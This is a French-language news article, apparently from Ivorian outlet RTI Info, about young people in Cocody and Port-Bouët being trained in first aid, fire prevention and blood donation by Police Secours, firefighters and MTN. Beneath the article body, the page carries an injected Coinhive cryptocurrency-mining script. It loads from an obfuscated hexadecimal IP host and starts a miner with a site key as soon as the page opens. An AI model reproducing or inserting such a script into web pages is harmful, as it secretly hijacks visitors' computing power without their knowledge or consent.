Des jeunes formés aux techniques de premier secours pour sauver des vies.
0
 

Écouter
Des jeunes formés aux techniques de premier secours pour sauver des vies.

Des jeunes formés aux techniques de premier secours pour sauver des vies.

RTI Info | Lu 1942 fois | Publié

De sources sanitaires ivoiriennes 1458 accidents ont causé 3200 blessés et 81 pertes en vie humaine en 2017. Les accidents domestiques et les incendies, eux, sont quasi quotidiens. Dans cette optique, il est nécessaire d’apprendre des gestes qui peuvent sauver des vies en situation de détresse. La plateforme « Police secours », appuyée par les sapeurs-pompiers et MTN Côte d’Ivoire ont initié un projet pour sensibiliser et former les populations des communes de Cocody et Port –Bouët aux gestes de premiers secours à travers des séances pratiques.

« Avec notre plateforme, nous apportons de l’assistance aux populations en détresse en coordination avec la Police Nationale et les pompiers. Nous avons remarqué que lors des accidents de la route, les victimes, avant l’arrivée des secours sont prises en charge par des personnes qui ne savent pas les gestes de premier secours. On trouve malheureusement des personnes qui perdent la vie, parce le bon geste n’a pas été exécuté », explique Assane Coulibaly Keita de Police Secours.

Outre cela, les jeunes ont été formés à la prévention des incendies et les accidents domestiques.

« Dans nos quartiers, il y a incendies et on ne sait pas comment faire. Avec les conseils des pompiers, je n’ai plus peur du feu. On peut maitriser une bouteille de gaz qui a pris feu dans une maison et circonscrire très rapidement un incendie avant qu’il ne se propage », souligne Adam Kanté, un étudiant dans la Commune de Cocody.

Les jeunes ont en outre, donné de leur sang et été sensibilisés à la prise en charge des AVC à travers des séances de dépistage des maladies métaboliques.

Les employés de la compagnie de télécommunication ont aussi participé à ces ateliers et séances de formations pratiques pour être utiles à la communauté.

Pour les pompiers, chaque entreprise ou structure public ou privée doit former son personnel aux gestes de premiers secours. C’est ainsi que des vies pourront être sauvées. Ils ont profité pour appeler à plus de civisme de la part des populations lors de leurs interventions.

 

 

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Un forum favorise l’initiation de 2.3 millions de jeunes africains au numérique

Un partenariat pour booster la politique de scolarisation de 100% des enfants

sept professeurs affectés au lycée moderne de Bangolo réduisant ainsi le déficit dont souffre cet établissement secondaire.

Plus de deux milliards de FCFA reversés à des retraités militaires et gendarmes

Le préfet du département de Korhogo et de la région du Poro, Daouda Ouattara, a annoncé son départ de la ville de Korhogo pour d’autres fonctions